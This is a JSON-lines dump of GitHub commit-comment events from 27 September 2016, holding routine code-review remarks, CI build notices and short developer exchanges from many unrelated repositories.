{"id":"4624417988","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19191210,"position":80,"line":80,"path":"language-project/web/src/main/java/language/servlet/RegistrationController.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T14:06:38Z","updated_at":"2016-09-27T14:06:38Z","body":"Напишите свой метод, как вы предлагаете сделать и давайте сравним.\r\n  "}},"created_at":"2016-09-27T14:06:38Z"}
{"id":"4624420989","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19191218,"position":null,"line":null,"path":null,"commit_id":"b8e2d8bb60b06c45901f19adda94909441c94577","created_at":"2016-09-27T14:07:07Z","updated_at":"2016-09-27T14:07:07Z","body":"[Code coverage](https://163-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-27T14:07:07Z"}
{"id":"4624421184","type":"CommitCommentEvent","actor":{"login":"samhed"},"repo":{"name":"kanaka/noVNC"},"payload":{"comment":{"id":19191219,"position":null,"line":null,"path":null,"commit_id":"86c67404c9c3087f521c3ad1cadb9a1514dc556a","created_at":"2016-09-27T14:07:09Z","updated_at":"2016-09-27T14:07:09Z","body":":+1: "}},"created_at":"2016-09-27T14:07:09Z"}
{"id":"4624421738","type":"CommitCommentEvent","actor":{"login":"emfluenceindia"},"repo":{"name":"subtata-emfluence/Weapsy"},"payload":{"comment":{"id":19191221,"position":null,"line":null,"path":null,"commit_id":"a2242621bfa42eebc3cf095f5e91fe38df1921c7","created_at":"2016-09-27T14:07:15Z","updated_at":"2016-09-27T14:07:15Z","body":"Admin user list pagination works. I have added a couple of modifications in `JavaScript` and `UserService.GetUsersViewModel` method to take 0 as NumberOfUsers and load all users. I am not sure if you would require this at all, but ideally \"All Records\" should be an option. If you don;t want I will revert back. Right now value could be passed by `recordsPerPage` parameter in `userViewModel()` function in `index.js` file.\r\n\r\nI am sorry because I did not discuss this feature before. If you don't like this approach I will stop doing this in the future and will discuss with you first."}},"created_at":"2016-09-27T14:07:15Z"}
{"id":"4624426321","type":"CommitCommentEvent","actor":{"login":"nuxwin"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19191234,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T14:07:59Z","updated_at":"2016-09-27T14:07:59Z","body":"@Ninos \r\n\r\nI've just tested with latest stable owncloud from https://owncloud.org/install/#instructions-server and indeed, with the `ProxyErrorOverride On`, there is a loading page problem and also the file integrity check doesn't works.\r\n\r\nTested under Jessie 8.6, last 1.3.x i-MSCP + the `ProxyErrorOverride On` added in 00_nameserver.conf\r\n"}},"created_at":"2016-09-27T14:07:59Z"}
{"id":"4624427837","type":"CommitCommentEvent","actor":{"login":"koenpunt"},"repo":{"name":"actuallymentor/Setup-Script-Nginx-Pagespeed-PHP7-Mariadb"},"payload":{"comment":{"id":19191235,"position":12,"line":12,"path":"setup.sh","commit_id":"c2ed6c834398a5a209117419c287b5d5baa653a2","created_at":"2016-09-27T14:08:14Z","updated_at":"2016-09-27T14:08:14Z","body":"`POST` requests are not considered for caching by default. Only `GET` and `HEAD` are. See http://nginx.org/en/docs/http/ngx_http_fastcgi_module.html#fastcgi_cache_methods"}},"created_at":"2016-09-27T14:08:14Z"}
{"id":"4624428337","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19191236,"position":15,"line":0,"path":"libraries/stdlib/src/kotlin/collections/AbstractCollection.kt","commit_id":"df5c628bbc5a211f12d5b866e4ffd0cc3cf3c598","created_at":"2016-09-27T14:08:19Z","updated_at":"2016-09-27T14:08:19Z","body":"|`line 31`|\n|---|\nAbstractCollection doesn't have particular equality semantics: it can be either ordered equality or set equality."}},"created_at":"2016-09-27T14:08:19Z"}
{"id":"4624430145","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19191243,"position":null,"line":null,"path":null,"commit_id":"01a6d816022dfd7048d72dbb98c9775d3ff34eac","created_at":"2016-09-27T14:08:36Z","updated_at":"2016-09-27T14:08:36Z","body":"[Code coverage](https://164-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-27T14:08:36Z"}
{"id":"4624431894","type":"CommitCommentEvent","actor":{"login":"atfornes"},"repo":{"name":"P2Pvalue/teem"},"payload":{"comment":{"id":19191247,"position":4,"line":3,"path":"src/templates/navbar-top/projects.html","commit_id":"895c6820feabde440bf9425d58184269c34aee02","created_at":"2016-09-27T14:08:53Z","updated_at":"2016-09-27T14:08:53Z","body":"@llopv, it seems like this commit not only changes the translations. I will discover this links now that featured projects are done"}},"created_at":"2016-09-27T14:08:53Z"}
{"id":"4624438231","type":"CommitCommentEvent","actor":{"login":"mccalluc"},"repo":{"name":"Caleydo/caleydo.github.io"},"payload":{"comment":{"id":19191260,"position":null,"line":null,"path":null,"commit_id":"5d1e8c9a1054fccb5730f46a65cfa29a00cd620c","created_at":"2016-09-27T14:09:51Z","updated_at":"2016-09-27T14:09:51Z","body":"(@thinkh: I've assumed a narrow frame in places would force line wraps... which was probably not a good assumption for me to make. --> I need to add more wrapping divs.)"}},"created_at":"2016-09-27T14:09:51Z"}
{"id":"4624439264","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19191263,"position":null,"line":null,"path":null,"commit_id":"817cdbbf850a7be10f85841b118f1b4feb5177b9","created_at":"2016-09-27T14:10:02Z","updated_at":"2016-09-27T14:10:02Z","body":"@ElbertoOne This version also allows more tweaks! :-)"}},"created_at":"2016-09-27T14:10:02Z"}
{"id":"4624439279","type":"CommitCommentEvent","actor":{"login":"barryvdh"},"repo":{"name":"barryvdh/laravel-translation-manager"},"payload":{"comment":{"id":19191264,"position":null,"line":null,"path":null,"commit_id":"0d253bf75236fdc0486ee7696bd7d756c7f5bc1b","created_at":"2016-09-27T14:10:02Z","updated_at":"2016-09-27T14:10:02Z","body":"What's the problem?"}},"created_at":"2016-09-27T14:10:02Z"}
{"id":"4624441638","type":"CommitCommentEvent","actor":{"login":"blackearth2014"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19191267,"position":null,"line":null,"path":null,"commit_id":"d80a81ae66911f54a382438efa47d1b1771a29d1","created_at":"2016-09-27T14:10:23Z","updated_at":"2016-09-27T14:10:23Z","body":"I need to see how that works in Nuke. Thanks."}},"created_at":"2016-09-27T14:10:23Z"}
{"id":"4624442942","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19191274,"position":11,"line":13,"path":"language-project/web/src/main/webapp/views/registration.jsp","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T14:10:35Z","updated_at":"2016-09-27T14:10:35Z","body":"Об этом думать буду на стадии верстки."}},"created_at":"2016-09-27T14:10:35Z"}
{"id":"4624442989","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19191275,"position":null,"line":null,"path":null,"commit_id":"bbc82be2d20c12b9b4cf0b6bfe8aedcf33f26f13","created_at":"2016-09-27T14:10:36Z","updated_at":"2016-09-27T14:10:36Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#I2WKkRQEQ46v7rlqAtPVfA"}},"created_at":"2016-09-27T14:10:36Z"}
{"id":"4624444778","type":"CommitCommentEvent","actor":{"login":"thinkh"},"repo":{"name":"Caleydo/caleydo.github.io"},"payload":{"comment":{"id":19191280,"position":null,"line":null,"path":null,"commit_id":"5d1e8c9a1054fccb5730f46a65cfa29a00cd620c","created_at":"2016-09-27T14:10:53Z","updated_at":"2016-09-27T14:10:53Z","body":"You mean inside each demo iframe?"}},"created_at":"2016-09-27T14:10:53Z"}
{"id":"4624447605","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19191285,"position":null,"line":null,"path":null,"commit_id":"a68e030d891ca86b53d2af729892cd9174c4fa52","created_at":"2016-09-27T14:11:19Z","updated_at":"2016-09-27T14:11:19Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1178](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14344&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:12:45"}},"created_at":"2016-09-27T14:11:19Z"}
{"id":"4624450883","type":"CommitCommentEvent","actor":{"login":"henrypp"},"repo":{"name":"henrypp/wfptool"},"payload":{"comment":{"id":19191291,"position":null,"line":null,"path":null,"commit_id":"206273ce32e2d0fd528b7e7aa6d5a154d30154dd","created_at":"2016-09-27T14:11:49Z","updated_at":"2016-09-27T14:11:49Z","body":"@jasonliul, in this file used incorrect encoding, need utf16le. i can't add this because i can't fix it. please change file encoding and send it to me!"}},"created_at":"2016-09-27T14:11:49Z"}
{"id":"4624453262","type":"CommitCommentEvent","actor":{"login":"themiurgo"},"repo":{"name":"DenisCarriere/geocoder"},"payload":{"comment":{"id":19191303,"position":null,"line":null,"path":null,"commit_id":"4c965abc38f3b8686ae98b53bf49028275605b20","created_at":"2016-09-27T14:12:08Z","updated_at":"2016-09-27T14:12:08Z","body":"Hi Denis,\r\n\r\nany reason for removing the rate limits? I used the cli tool today and was surprised to see by default no limits.\r\n\r\nAntonio"}},"created_at":"2016-09-27T14:12:08Z"}
{"id":"4624454914","type":"CommitCommentEvent","actor":{"login":"nuxwin"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19191306,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T14:12:23Z","updated_at":"2016-09-27T14:12:23Z","body":"@Ninos \r\n\r\nIt seem that the problem is due to owncloud default .htaccess file. I'll investigate. If I disable that file, all seem ok, even with the ``ProxyErrorOverride` directive."}},"created_at":"2016-09-27T14:12:23Z"}
{"id":"4624457477","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19191315,"position":null,"line":null,"path":null,"commit_id":"0c611442738447129551e460d72e1fe33269fb1b","created_at":"2016-09-27T14:12:48Z","updated_at":"2016-09-27T14:12:48Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#MdF4Ey_PQQaumLhfvBNsnQ"}},"created_at":"2016-09-27T14:12:48Z"}
{"id":"4624460130","type":"CommitCommentEvent","actor":{"login":"igoticecream"},"repo":{"name":"chuparCh0pper/Snorlax"},"payload":{"comment":{"id":19191328,"position":null,"line":null,"path":null,"commit_id":"66206cd43186dadd657312a06a5911089807befd","created_at":"2016-09-27T14:13:13Z","updated_at":"2016-09-27T14:13:13Z","body":"Sounds good"}},"created_at":"2016-09-27T14:13:13Z"}
{"id":"4624463861","type":"CommitCommentEvent","actor":{"login":"hajo3894"},"repo":{"name":"hajo3894/homeee-modified"},"payload":{"comment":{"id":19191334,"position":null,"line":null,"path":null,"commit_id":"b83c2a999f46591d1db9cd2ce226b8515d056bf1","created_at":"2016-09-27T14:13:48Z","updated_at":"2016-09-27T14:13:48Z","body":"great stuff"}},"created_at":"2016-09-27T14:13:48Z"}
{"id":"4624464379","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19191337,"position":null,"line":null,"path":null,"commit_id":"100637528d2f6b1bc36fe8dcf76d0bc63278ec9d","created_at":"2016-09-27T14:13:53Z","updated_at":"2016-09-27T14:13:53Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1179](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14351&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T14:13:53Z"}
{"id":"4624466476","type":"CommitCommentEvent","actor":{"login":"grzegorzgie"},"repo":{"name":"espocrm/espocrm"},"payload":{"comment":{"id":19191343,"position":null,"line":null,"path":null,"commit_id":"38d4a39014df952c5618ce69628f66ed62b61e38","created_at":"2016-09-27T14:14:13Z","updated_at":"2016-09-27T14:14:13Z","body":"Hello Yuri, u wanna add multi e-mail mass mail module? :) \r\nNice code"}},"created_at":"2016-09-27T14:14:13Z"}
{"id":"4624468132","type":"CommitCommentEvent","actor":{"login":"anderssonjohn"},"repo":{"name":"anderssonjohn/Welcome"},"payload":{"comment":{"id":19191346,"position":null,"line":null,"path":null,"commit_id":"5dddb8cf765d124a06cc6878573db98a4b7e9f3d","created_at":"2016-09-27T14:14:29Z","updated_at":"2016-09-27T14:14:29Z","body":"Test"}},"created_at":"2016-09-27T14:14:29Z"}
{"id":"4624470042","type":"CommitCommentEvent","actor":{"login":"brussee"},"repo":{"name":"csrdelft/csrdelft.nl"},"payload":{"comment":{"id":19191350,"position":null,"line":null,"path":null,"commit_id":"534a5cfe01b2d3f506592c2cba128c9648e56f41","created_at":"2016-09-27T14:14:48Z","updated_at":"2016-09-27T14:14:48Z","body":"In de comment staat het nog steeds fout: AuthenticationMethod::token_url"}},"created_at":"2016-09-27T14:14:48Z"}
{"id":"4624474418","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19191364,"position":92,"line":92,"path":"src/js/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-27T14:15:30Z","updated_at":"2016-09-27T14:15:30Z","body":"We'll turn this i into a button... i's aren't natively focusable nor do they have a semantic name. You could wrap the button right around and if we're using Elements you can use the default-button styles even."}},"created_at":"2016-09-27T14:15:30Z"}
{"id":"4624475560","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sam828/relaxr-landing-page"},"payload":{"comment":{"id":19191371,"position":42,"line":42,"path":"css/style.css","commit_id":"95e7dc4dedf33be91073c02fa9bb9949ed2f631f","created_at":"2016-09-27T14:15:40Z","updated_at":"2016-09-27T14:15:40Z","body":"hmm was this suppose to be a class?"}},"created_at":"2016-09-27T14:15:40Z"}
{"id":"4624475761","type":"CommitCommentEvent","actor":{"login":"nicegdhj"},"repo":{"name":"nicegdhj/show-me-the-code"},"payload":{"comment":{"id":19191372,"position":40,"line":38,"path":"README.md","commit_id":"98b9d7b0c8b709ef68186c2fa4c86439e39081f2","created_at":"2016-09-27T14:15:42Z","updated_at":"2016-09-27T14:15:42Z","body":"这是我自己修改的！！！6666666666我只是试一试该怎么用github编辑"}},"created_at":"2016-09-27T14:15:42Z"}
{"id":"4624476210","type":"CommitCommentEvent","actor":{"login":"mccalluc"},"repo":{"name":"Caleydo/caleydo.github.io"},"payload":{"comment":{"id":19191374,"position":null,"line":null,"path":null,"commit_id":"5d1e8c9a1054fccb5730f46a65cfa29a00cd620c","created_at":"2016-09-27T14:15:46Z","updated_at":"2016-09-27T14:15:46Z","body":"Like, I might prefer the scatterplot axis controls to be below, rather than to the right, but it's not a big deal."}},"created_at":"2016-09-27T14:15:46Z"}
{"id":"4624476458","type":"CommitCommentEvent","actor":{"login":"igoticecream"},"repo":{"name":"chuparCh0pper/Snorlax"},"payload":{"comment":{"id":19191376,"position":null,"line":null,"path":null,"commit_id":"969d676b4bdd7c53dfb50175aa0f1589408546ef","created_at":"2016-09-27T14:15:49Z","updated_at":"2016-09-27T14:15:49Z","body":"For this to work, we have to return something on \"processInboundPackage\" at \"MitmProvider\" and uncommend code in \"MitmInputStream\". It will take a little extra work.\r\n\r\nI was thinking on subscribing listeners for each request type that wants to modify the bytes in processInboundPackage"}},"created_at":"2016-09-27T14:15:49Z"}
{"id":"4624479188","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sam828/relaxr-landing-page"},"payload":{"comment":{"id":19191386,"position":25,"line":25,"path":"index.html","commit_id":"95e7dc4dedf33be91073c02fa9bb9949ed2f631f","created_at":"2016-09-27T14:16:16Z","updated_at":"2016-09-27T14:16:16Z","body":"This should be using a `<a>` tag instead of h3 and center."}},"created_at":"2016-09-27T14:16:16Z"}
{"id":"4624481341","type":"CommitCommentEvent","actor":{"login":"omhybrid"},"repo":{"name":"iblank/ngImgCrop"},"payload":{"comment":{"id":19191389,"position":null,"line":null,"path":null,"commit_id":"f5440c5ed5098b6552b71214f2096fbfc2a64379","created_at":"2016-09-27T14:16:37Z","updated_at":"2016-09-27T14:16:37Z","body":"result-image-aspect is not working"}},"created_at":"2016-09-27T14:16:37Z"}
{"id":"4624481452","type":"CommitCommentEvent","actor":{"login":"nuxwin"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19191390,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T14:16:38Z","updated_at":"2016-09-27T14:16:38Z","body":"@Ninos \r\n\r\nThe problem occurs when:\r\n\r\nThe `ProxyErrorOverride` is present in the 00_nameserver.conf file and when there is the following two directives in the .htaccess file of the owncloud documentRoot (default):\r\n\r\n```\r\nErrorDocument 403 /core/templates/403.php\r\nErrorDocument 404 /core/templates/404.php\r\n```"}},"created_at":"2016-09-27T14:16:38Z"}
{"id":"4624482803","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19191393,"position":94,"line":94,"path":"src/js/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-27T14:16:51Z","updated_at":"2016-09-27T14:16:51Z","body":"We're also going to give this h2 an id, meaning we probably need to use uuid. In fact, likely all components will need to import this, since a lot of aria-junk relies on id's matching attributes (yeah, this sucks and the spec people are looking into how to get rid of all that in the future since it won't work across shadow-DOM etc)."}},"created_at":"2016-09-27T14:16:51Z"}
{"id":"4624484076","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sam828/relaxr-landing-page"},"payload":{"comment":{"id":19191397,"position":56,"line":56,"path":"index.html","commit_id":"95e7dc4dedf33be91073c02fa9bb9949ed2f631f","created_at":"2016-09-27T14:17:03Z","updated_at":"2016-09-27T14:17:03Z","body":"let's use `text-align: center;` in the css instead of the center element."}},"created_at":"2016-09-27T14:17:03Z"}
{"id":"4624488441","type":"CommitCommentEvent","actor":{"login":"damianpoole"},"repo":{"name":"steyep/alfred-jira"},"payload":{"comment":{"id":19191405,"position":null,"line":null,"path":null,"commit_id":"f4e2ef89f959d1672373bcc77f485a286c670594","created_at":"2016-09-27T14:17:43Z","updated_at":"2016-09-27T14:17:43Z","body":"That's what I did in my local version 👍 "}},"created_at":"2016-09-27T14:17:43Z"}
{"id":"4624488633","type":"CommitCommentEvent","actor":{"login":"naveengogineni"},"repo":{"name":"naveengogineni/upkarmeadows"},"payload":{"comment":{"id":19191407,"position":null,"line":null,"path":null,"commit_id":"40cfa478a5fbf684704c6d30e7928621615304fa","created_at":"2016-09-27T14:17:44Z","updated_at":"2016-09-27T14:17:44Z","body":"revert to initial"}},"created_at":"2016-09-27T14:17:44Z"}
{"id":"4624491561","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19191410,"position":131,"line":131,"path":"src/js/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-27T14:18:11Z","updated_at":"2016-09-27T14:18:11Z","body":"we're going to listen to 2 keys for this one... both space and enter."}},"created_at":"2016-09-27T14:18:11Z"}
{"id":"4624493589","type":"CommitCommentEvent","actor":{"login":"dddejan"},"repo":{"name":"CVC4/CVC4"},"payload":{"comment":{"id":19191416,"position":null,"line":null,"path":null,"commit_id":"f5ccf00833045487f75d2e241ea6b428f7da5dc2","created_at":"2016-09-27T14:18:29Z","updated_at":"2016-09-27T14:18:29Z","body":"This breaks the build, you have \r\n\r\n```\r\nconst TNode parent = ...\r\n```\r\n\r\nand later in the code there is \r\n\r\n```\r\nparent = TNode()\r\n```\r\n\r\nI don't understand the reason why parent has to be reset but \r\n```\r\n  CXX      theory/unconstrained_simplifier.lo\r\n../../../../src/theory/unconstrained_simplifier.cpp: In member function 'void CVC4::UnconstrainedSimplifier::processUnconstrained()':\r\n../../../../src/theory/unconstrained_simplifier.cpp:658:20: error: passing 'const TNode {aka const CVC4::NodeTemplate<false>}' as 'this' argument of 'CVC4::NodeTemplate<ref_count_1>& CVC4::NodeTemplate<ref_count>::operator=(const CVC4::NodeTemplate<ref_count>&) [with bool ref_count = false]' discards qualifiers [-fpermissive]\r\n             parent = TNode();\r\n                    ^\r\n```"}},"created_at":"2016-09-27T14:18:29Z"}
{"id":"4624495012","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sam828/relaxr-landing-page"},"payload":{"comment":{"id":19191418,"position":65,"line":65,"path":"index.html","commit_id":"95e7dc4dedf33be91073c02fa9bb9949ed2f631f","created_at":"2016-09-27T14:18:42Z","updated_at":"2016-09-27T14:18:42Z","body":"This should be a `<a>` tag instead. You should use one class to style both these buttons and then add an extra class to change the colors."}},"created_at":"2016-09-27T14:18:42Z"}
{"id":"4624495594","type":"CommitCommentEvent","actor":{"login":"thess"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":19191420,"position":null,"line":null,"path":null,"commit_id":"b3e1b589d78aec15d81cf49e4c4afd9cd28f6fb6","created_at":"2016-09-27T14:18:47Z","updated_at":"2016-09-27T14:18:47Z","body":"@maximeguerreiro - Package has no maintainer. The last maintainer wished to be removed and no one volunteered (see #3013). If someone wants to see this package back in the repo, it should be re-submitted by the new maintainer. Are you volunteering?"}},"created_at":"2016-09-27T14:18:47Z"}
{"id":"4624496810","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19191424,"position":null,"line":null,"path":null,"commit_id":"efd72a3465ac2267ea3a9f70912f2e5fc9d0b5e8","created_at":"2016-09-27T14:18:58Z","updated_at":"2016-09-27T14:18:58Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#PVLMSPDOS7Cj-tCi5B7qtg"}},"created_at":"2016-09-27T14:18:58Z"}
{"id":"4624499444","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sam828/relaxr-landing-page"},"payload":{"comment":{"id":19191429,"position":56,"line":56,"path":"index.html","commit_id":"95e7dc4dedf33be91073c02fa9bb9949ed2f631f","created_at":"2016-09-27T14:19:21Z","updated_at":"2016-09-27T14:19:21Z","body":"There's no \"p2\" tag, I'm assuming you meaning this to be a p tag?"}},"created_at":"2016-09-27T14:19:21Z"}
{"id":"4624500456","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19191433,"position":null,"line":null,"path":null,"commit_id":"3581792e3d0642a4f529f3c03d8cf15744aeabf3","created_at":"2016-09-27T14:19:31Z","updated_at":"2016-09-27T14:19:31Z","body":"I had already finished 2.2.1 yesterday, but she is going over it with the class."}},"created_at":"2016-09-27T14:19:31Z"}
{"id":"4624500711","type":"CommitCommentEvent","actor":{"login":"yurikuzn"},"repo":{"name":"espocrm/espocrm"},"payload":{"comment":{"id":19191434,"position":null,"line":null,"path":null,"commit_id":"38d4a39014df952c5618ce69628f66ed62b61e38","created_at":"2016-09-27T14:19:33Z","updated_at":"2016-09-27T14:19:33Z","body":"Hi,\r\n\r\nI don't understand what does multi email mean."}},"created_at":"2016-09-27T14:19:33Z"}
{"id":"4624501464","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":19191437,"position":10,"line":6,"path":"pkgbuild-introspection-git/PKGBUILD","commit_id":"023066b0a28a28419b869bc18d29b607c6a6bc31","created_at":"2016-09-27T14:19:41Z","updated_at":"2016-09-27T14:19:41Z","body":"1 不比 1.0 小呀。"}},"created_at":"2016-09-27T14:19:41Z"}
{"id":"4624501777","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19191438,"position":139,"line":139,"path":"src/js/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-27T14:19:43Z","updated_at":"2016-09-27T14:19:43Z","body":"Normally Javascript won't let you set focus() on someone who doesn't have some kind of tabindex (either 0 or -1). Since we're going to turn it into a button, this code above can remain (except adjust the class name and probably we may want an id because what if there are other buttons with pe-icon--times or pe-btn on the page?)."}},"created_at":"2016-09-27T14:19:43Z"}
{"id":"4624509102","type":"CommitCommentEvent","actor":{"login":"omgmog"},"repo":{"name":"tingbot/ocean"},"payload":{"comment":{"id":19191449,"position":null,"line":null,"path":null,"commit_id":"d70daec027ca5bbfe41004bf8488934df6c60a93","created_at":"2016-09-27T14:20:49Z","updated_at":"2016-09-27T14:20:49Z","body":"👏  🎉 "}},"created_at":"2016-09-27T14:20:49Z"}
{"id":"4624509860","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19191451,"position":150,"line":150,"path":"src/js/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-27T14:20:56Z","updated_at":"2016-09-27T14:20:56Z","body":"'¡Si!'"}},"created_at":"2016-09-27T14:20:56Z"}
{"id":"4624510269","type":"CommitCommentEvent","actor":{"login":"yurizhuravel"},"repo":{"name":"yurizhuravel/yelp_clone"},"payload":{"comment":{"id":19191453,"position":147,"line":80,"path":"spec/features/restaurants_feature_spec.rb","commit_id":"a1898998f21111e10351f11b0fd9da5c0226e727","created_at":"2016-09-27T14:21:00Z","updated_at":"2016-09-27T14:21:00Z","body":"Great insight mate, thanks a lot! Keep going if you don't mind!"}},"created_at":"2016-09-27T14:21:00Z"}
{"id":"4624514232","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19191460,"position":20,"line":20,"path":"src/js/defaultMessages.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-27T14:21:36Z","updated_at":"2016-09-27T14:21:36Z","body":"Standard?"}},"created_at":"2016-09-27T14:21:36Z"}
{"id":"4624520070","type":"CommitCommentEvent","actor":{"login":"jasonliul"},"repo":{"name":"henrypp/wfptool"},"payload":{"comment":{"id":19191467,"position":null,"line":null,"path":null,"commit_id":"206273ce32e2d0fd528b7e7aa6d5a154d30154dd","created_at":"2016-09-27T14:22:30Z","updated_at":"2016-09-27T14:22:30Z","body":"@henrypp \r\nYou mean utf-16 little endian?"}},"created_at":"2016-09-27T14:22:30Z"}
{"id":"4624522579","type":"CommitCommentEvent","actor":{"login":"ykhaam"},"repo":{"name":"kosslab-kr/Titanium-SaveMyFriend"},"payload":{"comment":{"id":19191473,"position":null,"line":null,"path":null,"commit_id":"ac7faff32d0ebfb733b8b0b38871dcadd61d299b","created_at":"2016-09-27T14:22:53Z","updated_at":"2016-09-27T14:22:53Z","body":"+\t- Disaster message can't be sent to all of the citizens because of physical and technical limitations.   \r\n+\t- If there are people who receive disaster message firstly, they can resend it to their friends and family using SMS or Push Message.  \r\n이 부분에서 문법 오류 약간 고쳤어요! \r\n+\t- Needs to increase efficiency of sending disaster message.  \r\n여기는 정확히 무슨 말을 하려는지 제가 이해를 못해서..ㅠㅠ needs to를 빼는게 나을 것 같아요!\r\n+\t- The most mobile companies provide 'free SMS service'. we used this.\r\n만약 the most가 대부분이라는 뜻을 말하는 거라면 the를 빼는게 맞고, '가장 많은'이라는 뜻을 말하는 거라면 맞게 쓰신거에요! 혹시나 해서 첨부합니다!\r\n중요한 건 아니지만 자잘한 오류들만 고쳤어요! 화이팅"}},"created_at":"2016-09-27T14:22:53Z"}
{"id":"4624522900","type":"CommitCommentEvent","actor":{"login":"GabsGear"},"repo":{"name":"GabsGear/C-RSA-encryption"},"payload":{"comment":{"id":19191474,"position":46,"line":105,"path":"main.cpp","commit_id":"8549768554e8f9cd8dcfd31fb06add2fe6d04ddd","created_at":"2016-09-27T14:22:55Z","updated_at":"2016-09-27T14:22:55Z","body":"This "}},"created_at":"2016-09-27T14:22:55Z"}
{"id":"4624523880","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19191477,"position":42,"line":42,"path":"test/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-27T14:23:04Z","updated_at":"2016-09-27T14:23:04Z","body":"Should we still do this? If it doesn't work, doesn't that mean React itself failed?"}},"created_at":"2016-09-27T14:23:04Z"}
